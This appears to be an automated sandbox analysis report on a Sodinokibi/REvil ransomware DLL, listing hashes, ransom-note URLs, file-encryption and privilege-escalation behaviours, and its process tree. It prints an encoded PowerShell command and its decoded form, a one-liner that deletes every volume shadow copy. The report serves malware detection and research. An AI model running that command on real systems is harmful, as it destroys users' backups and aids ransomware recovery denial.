Analysis
- max time kernel: 149s
- max time network: 155s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 09-11-2020 19:26
Static task: static1
Behavioral task: behavioral1
- Sample: file.dll
- Resource: win7v20201028
Behavioral task: behavioral2
- Sample: file.dll
- Resource: win10v20201028
General
- Target: file.dll
- Size: 166KB
- MD5: 9e9b0ef4fc739c3eb36a762122451992
- SHA1: 035fe67a3d04f0a678724851cabc917b28416fe1
- SHA256: 0ee7783213426a5e46bc11a91acf5f2d73890bb09bbf4f3b932a4b79eeb6b820
- SHA512: 01435694c0941b004584d40c3d11866e8f319445ed937095d9777911bd6f36c6bd9449b4effa369120cf6ded9de9a375719e256c6f8380bd5fbd4f4ca0c6d715
Malware Config
Extracted from: C:\0vwq6-readme.txt
- Family: sodinokibi
- URLs:
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0AC4EE68378C0111
  - http://decryptor.cc/0AC4EE68378C0111
Signatures
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Blacklisted process makes network request (115 IoCs)
  Process: rundll32.exe (PID 1416)
  Network flows attributed to PID 1416 (flow ids shown in the report): 15, 20, 23, 26, 28, 30, 32, 34, 36, 38, 40, 42, 44, 46, 48, 50, 52, 54, 56, 58, 59, 60, 61, 63, 65, 67, 69, 71, 73, 75, 77, 79, 81, 83, 85, 87, 89, 91, 93, 95, 97, 99, 101, 103, 105, 107, 108, 110, 112, 114, 116, 118, 120, 121, 123, 125, 127, 128, 130, 132, 134, 136, 138, 140
- Modifies extensions of user files (3 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Process: rundll32.exe
  - File opened for modification: \??\c:\users\admin\pictures\RestoreClose.tiff
  - File renamed: C:\Users\Admin\Pictures\RestoreClose.tiff => \??\c:\users\admin\pictures\RestoreClose.tiff.0vwq6
  - File renamed: C:\Users\Admin\Pictures\SwitchDebug.crw => \??\c:\users\admin\pictures\SwitchDebug.crw.0vwq6
- Enumerates connected drives (3 TTPs, 25 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Process: rundll32.exe
  File opened (read-only), in the order recorded: \??\V:, \??\A:, \??\F:, \??\I:, \??\K:, \??\M:, \??\H:, \??\J:, \??\R:, \??\S:, \??\X:, \??\Z:, \??\D:, \??\B:, \??\N:, \??\Q:, \??\W:, \??\Y:, \??\T:, \??\U:, \??\E:, \??\G:, \??\L:, \??\O:, \??\P:
- Modifies service (2 TTPs, 5 IoCs)
  Process: vssvc.exe
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Process: rundll32.exe
  - Set value (str): \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\bavg7orl.bmp"
- Drops file in Program Files directory (31 IoCs)
  Process: rundll32.exe
  - File opened for modification: \??\c:\program files\SuspendClear.xht
  - File opened for modification: \??\c:\program files\UndoRemove.dot
  - File opened for modification: \??\c:\program files\ExpandSelect.php
  - File opened for modification: \??\c:\program files\ImportMount.xhtml
  - File opened for modification: \??\c:\program files\OpenSkip.mp3
  - File opened for modification: \??\c:\program files\SubmitInstall.xla
  - File opened for modification: \??\c:\program files\BackupExport.png
  - File opened for modification: \??\c:\program files\ConvertToResolve.docm
  - File opened for modification: \??\c:\program files\ExitSplit.iso
  - File opened for modification: \??\c:\program files\InitializeCopy.ppsx
  - File opened for modification: \??\c:\program files\LockRestart.m4v
  - File created: \??\c:\program files\0vwq6-readme.txt
  - File opened for modification: \??\c:\program files\ConvertToStop.clr
  - File opened for modification: \??\c:\program files\CompleteExport.rle
  - File opened for modification: \??\c:\program files\FormatSave.dwfx
  - File opened for modification: \??\c:\program files\JoinLock.mpeg3
  - File opened for modification: \??\c:\program files\TestUninstall.docx
  - File opened for modification: \??\c:\program files\StopImport.svgz
  - File opened for modification: \??\c:\program files\SubmitBlock.DVR-MS
  - File opened for modification: \??\c:\program files\TestOptimize.jfif
  - File created: \??\c:\program files (x86)\0vwq6-readme.txt
  - File opened for modification: \??\c:\program files\CompressSelect.sql
  - File opened for modification: \??\c:\program files\StartComplete.m4a
  - File opened for modification: \??\c:\program files\OutOptimize.xla
  - File opened for modification: \??\c:\program files\RegisterUninstall.ex_
  - File opened for modification: \??\c:\program files\RestartTrace.jpe
  - File opened for modification: \??\c:\program files\WaitRemove.mpv2
  - File opened for modification: \??\c:\program files\WaitUse.jfif
  - File opened for modification: \??\c:\program files\BlockSelect.mov
  - File opened for modification: \??\c:\program files\GroupDebug.nfo
  - File opened for modification: \??\c:\program files\LockUnlock.dwg
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: rundll32.exe, powershell.exe
  - PID 1416 rundll32.exe (2 occurrences)
  - PID 3772 powershell.exe (3 occurrences)
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes: rundll32.exe, powershell.exe, vssvc.exe
  - Token: SeDebugPrivilege, PID 1416 rundll32.exe
  - Token: SeDebugPrivilege, PID 3772 powershell.exe
  - Token: SeBackupPrivilege, PID 504 vssvc.exe
  - Token: SeRestorePrivilege, PID 504 vssvc.exe
  - Token: SeAuditPrivilege, PID 504 vssvc.exe
- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes: rundll32.exe, rundll32.exe
  - PID 980 (rundll32.exe) wrote to memory of PID 1416 (rundll32.exe) (3 occurrences)
  - PID 1416 (rundll32.exe) wrote to memory of PID 3772 (powershell.exe) (2 occurrences)
Processes
- C:\Windows\system32\rundll32.exe
  Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\file.dll,#1
  PID: 980
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\rundll32.exe (child of PID 980)
    Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\file.dll,#1
    PID: 1416
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Enumerates connected drives
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of PID 1416)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      The -e argument is base64-encoded UTF-16LE; it decodes to `Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}`, which deletes every volume shadow copy via WMI. This is the shadow-copy removal step that precedes encryption, and it is consistent with the vssvc.exe activity recorded below (the VSS service being started and its backup/restore privileges enabled). Encoded PowerShell launched from rundll32.exe that touches Win32_Shadowcopy is a high-fidelity detection point for this family.
      PID: 3772
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\wbem\unsecapp.exe
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
  PID: 3932
- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 504
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
- memory/1416-0-0x0000000000000000-mapping.dmp
- memory/3772-1-0x0000000000000000-mapping.dmp
- memory/3772-2-0x00007FFA12FF0000-0x00007FFA139DC000-memory.dmp (Filesize: 9.9MB)
- memory/3772-3-0x00000156755E0000-0x00000156755E1000-memory.dmp (Filesize: 4KB)
- memory/3772-4-0x0000015675790000-0x0000015675791000-memory.dmp (Filesize: 4KB)